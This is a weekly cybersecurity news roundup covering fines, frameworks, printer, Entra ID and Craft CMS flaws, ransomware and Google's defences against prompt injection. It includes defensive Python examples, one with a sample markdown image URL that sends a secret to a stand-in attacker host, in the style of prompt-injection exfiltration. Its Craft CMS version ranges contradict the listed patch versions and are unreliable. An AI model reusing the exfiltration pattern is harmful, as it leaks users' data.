
This Week in Cybersecurity: Looking Back at Week 26

June 26, 2025

In this week's cybersecurity news, organisations across sectors, from education to enterprise tech, have been confronted with both new risks and regulatory shifts. In Ireland, the City of Dublin Education and Training Board faces a hefty €125,000 fine after failing to safeguard sensitive student grant data, while the country simultaneously launches a national cybersecurity framework inspired by NIST standards to boost organisational resilience.

Meanwhile, vulnerabilities in popular technologies have raised alarm bells worldwide. A critical flaw affecting millions of Brother printers, a privilege escalation loophole in Microsoft Entra ID, and a high-risk remote code execution (RCE) vulnerability in Craft CMS underscore the urgent need for patching and proactive defence.

At the same time, threat actors are evolving. The newly identified Dire Wolf ransomware strain is targeting manufacturing and tech firms with devastating precision. In response to these growing threats, tech giants like Google are fortifying their GenAI platforms with multi-layered protections designed to prevent misuse and data leakage.

City of Dublin Education Board Fined €125K for Failing to Secure Student Grant Data

The Irish Data Protection Commission (DPC) has reprimanded the City of Dublin Education and Training Board (CDETB) after discovering malware on its web server and the retention of sensitive student grant data covering about 13,000 applicants from 2017 to 2018, without proper security measures. The compromised information included names, dates of birth, PPS numbers, contact details, and even health and ethnic data.

The DPC noted that CDETB violated GDPR Articles 5, 32, 33, and 34 by failing to implement adequate security, promptly report the breach to the DPC, and notify affected individuals. As a result, CDETB has been fined €125,000 and ordered to strengthen its data protection practices.

The DPC emphasised that public bodies must assess data risks, implement protective measures, and adhere to breach notification requirements.


Ireland Launches a NIST-Based Cybersecurity Framework to Support Compliance

Ireland’s National Cyber Security Centre (NCSC) has introduced CyberFundamentals (CyFun), a voluntary, risk-based cybersecurity maturity framework aligned with the NIST Cybersecurity Framework v1.1 (upgrading to v2.0 by Q3 2025).

Co-owned with Belgium, CyFun offers tiered assessments tailored to an organisation’s size, sector, and NIS2-related risk exposure.

It assists entities in implementing essential cybersecurity functions and positions CyFun certification as a credible route to demonstrating NIS2 compliance.

The NCSC recommends adopting CyFun to build structured, evidence-based cyber controls that support regulatory obligations and foster trust across supply chains.


Millions of Brother Printers Affected by Critical Vulnerability

A critical vulnerability in many Brother products allows attackers to retrieve or reset default admin credentials, leading to full device compromise. With a CVSS score of 9.8, this flaw cannot be fully patched by users, meaning the devices remain exposed even with firmware updates.

Security teams are advised to isolate these printers from internet access, implement network segmentation, and monitor for unusual activity.


Entra ID Flaw Lets Guests Hijack Subscriptions and Escalate Privileges

A serious design oversight in Microsoft Entra ID allows invited guest users to create and transfer their own Azure subscriptions into a tenant, gaining full “Owner” privileges without directory admin roles.

Attackers need only an account with billing permissions in their home tenant. They then invite themselves as guests in the target tenant, create a subscription, and automatically receive high-level RBAC rights within the new environment. Once privileged, they can weaken tenant policies, list administrators, register managed identities, and exploit device-based conditional access, all under the radar.

To mitigate this hidden risk, organisations must enforce subscription policies to block guest subscriptions, audit guest users, and monitor for unexpected subscription activity.
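One way to run the guest audit recommended above, as an added example that is not from the original article or from Microsoft: it cross-references a user export with a role-assignment export and lists guests holding Owner at subscription root. The sample records are constructed, and `APPROVED_SUBSCRIPTIONS` is a hypothetical inventory of sanctioned subscription IDs (lowercase).

```python
import json

# Constructed sample exports, not from a real tenant. Field names follow
# Microsoft Graph user objects and `az role assignment list` JSON output.
USERS = json.loads("""[
  {"id": "u-1", "userPrincipalName": "alice@contoso.example", "userType": "Member"},
  {"id": "u-2", "userPrincipalName": "bob_fabrikam.example#EXT#@contoso.example", "userType": "Guest"},
  {"id": "u-3", "userPrincipalName": "carol_partner.example#EXT#@contoso.example", "userType": null}
]""")
ASSIGNMENTS = json.loads("""[
  {"principalId": "u-1", "roleDefinitionName": "Owner", "scope": "/subscriptions/sub-aaaa"},
  {"principalId": "u-2", "roleDefinitionName": "Owner", "scope": "/subscriptions/SUB-BBBB/"},
  {"principalId": "u-3", "roleDefinitionName": "Owner", "scope": "/subscriptions/sub-aaaa"},
  {"principalId": "u-2", "roleDefinitionName": "Reader", "scope": "/subscriptions/sub-aaaa/resourceGroups/rg1"}
]""")
APPROVED_SUBSCRIPTIONS = {"sub-aaaa"}  # hypothetical inventory of sanctioned subscriptions

def is_guest(user):
    """Guest if Graph says so; fall back to the #EXT# marker in guest UPNs."""
    if (user.get("userType") or "").lower() == "guest":
        return True
    return "#ext#" in (user.get("userPrincipalName") or "").lower()

def subscription_id(scope):
    """Return the subscription id when the scope is the subscription root, else None."""
    parts = [p for p in scope.strip("/").split("/") if p]
    if len(parts) == 2 and parts[0].lower() == "subscriptions":
        return parts[1].lower()
    return None

def guest_owner_findings(users, assignments, approved):
    """List guests holding Owner at subscription root, flagging unknown subscriptions."""
    guests = {u["id"]: u["userPrincipalName"] for u in users if is_guest(u)}
    findings = []
    for a in assignments:
        sub = subscription_id(a.get("scope", ""))
        if sub and a.get("roleDefinitionName") == "Owner" and a.get("principalId") in guests:
            findings.append({
                "guest": guests[a["principalId"]],
                "subscription": sub,
                "unapproved_subscription": sub not in approved,
            })
    # Unknown subscriptions first: they fit the guest-created pattern described above.
    return sorted(findings, key=lambda f: (not f["unapproved_subscription"], f["guest"]))

if __name__ == "__main__":
    for finding in guest_owner_findings(USERS, ASSIGNMENTS, APPROVED_SUBSCRIPTIONS):
        print(finding)
```
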


Google Adds Multi-Layered Defences to Secure GenAI

Google has introduced advanced “layered” security controls into its Generative AI systems, including Gemini, to defend against indirect prompt injections. This is a growing threat whereby attackers embed malicious commands within external data sources like emails, documents, or calendar invites.

The multilayered strategy includes AI prompt classifiers, “spotlighting” markers to steer models away from malicious content, markdown sanitisation, suspicious URL redaction via Safe Browsing, mandatory user confirmations for risky actions, and real-time alerts to users. These safeguards collectively elevate the cost and complexity for adversaries aiming to exploit AI systems.

Despite increased sophistication, Google cautions that attackers continue to develop adaptive prompt injection techniques, underscoring the ongoing need for “defense in depth.”
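To illustrate two of the layers listed above, markdown sanitisation and URL redaction, here is an added example that is not Google's implementation: it filters model output before rendering. The `TRUSTED_HOSTS` allowlist is a hypothetical stand-in for a URL-reputation lookup, and the sample text is constructed.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; stands in for a URL-reputation lookup such as Safe Browsing.
TRUSTED_HOSTS = {"docs.example.com"}

IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
LINK_RE = re.compile(r"(?<!!)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
BARE_URL_RE = re.compile(r"https?://[^\s)>\]]+")

# Constructed model output mixing trusted and untrusted targets.
SAMPLE = ("Summary ready. ![s](https://evil.example/p.png?d=SECRET) "
          "See [guide](https://docs.example.com/a) or [here](https://evil.example/x) "
          "and https://evil.example/y")


def is_trusted(url):
    """True only for http(s) URLs whose parsed hostname is on the allowlist."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()  # parsed host, so userinfo before '@' is ignored
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and host in TRUSTED_HOSTS


def sanitise_model_output(text):
    """Neutralise untrusted images, links and bare URLs before rendering."""
    # Images load on render without a click, so untrusted ones are dropped entirely.
    text = IMAGE_RE.sub(
        lambda m: m.group(0) if is_trusted(m.group(2)) else "[image removed]", text)
    # Links keep their visible label but lose the untrusted target.
    text = LINK_RE.sub(
        lambda m: m.group(0) if is_trusted(m.group(2)) else m.group(1) + " [link removed]", text)
    # Anything left that still looks like a URL is checked the same way.
    return BARE_URL_RE.sub(
        lambda m: m.group(0) if is_trusted(m.group(0)) else "[url removed]", text)


if __name__ == "__main__":
    print(sanitise_model_output(SAMPLE))
```
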


Dire Wolf Ransomware Emerges as High-Impact Threat to Manufacturing and Tech Firms

A new Dire Wolf ransomware strain is targeting technology and manufacturing sectors with devastating effect, employing a combination of file encryption, data theft, and public data-leak extortion tactics.

Victims discover their files renamed with a .direwolf extension and receive a ransom note threatening public disclosure unless payment is made promptly.

Analysts emphasise that rapid identification and immediate isolation of infected systems are vital. Recovery requires full device restoration from offline backups, as decryption without paying the ransom is usually not feasible.


Critical RCE Flaw in Craft CMS Patched After High-Risk Exposure

The NCSC has issued a TLP:CLEAR advisory for CVE‑2025‑32432, a critical remote code execution vulnerability with a CVSS score of 10.0 in Craft CMS versions 3.0.0‑RC1 to 3.9.15, 4.0.0‑RC1 to 4.14.15, and 5.0.0‑RC1 to 5.6.17. Attackers could exploit insecure deserialisation in the Asset Transform process to execute arbitrary code without authentication.

Patches were released in Craft CMS versions 3.9.15, 4.14.15, and 5.6.17, fixing this flaw along with a related Yii framework issue.

The NCSC strongly recommends immediate patching following thorough testing to prevent potential compromise of CMS environments.

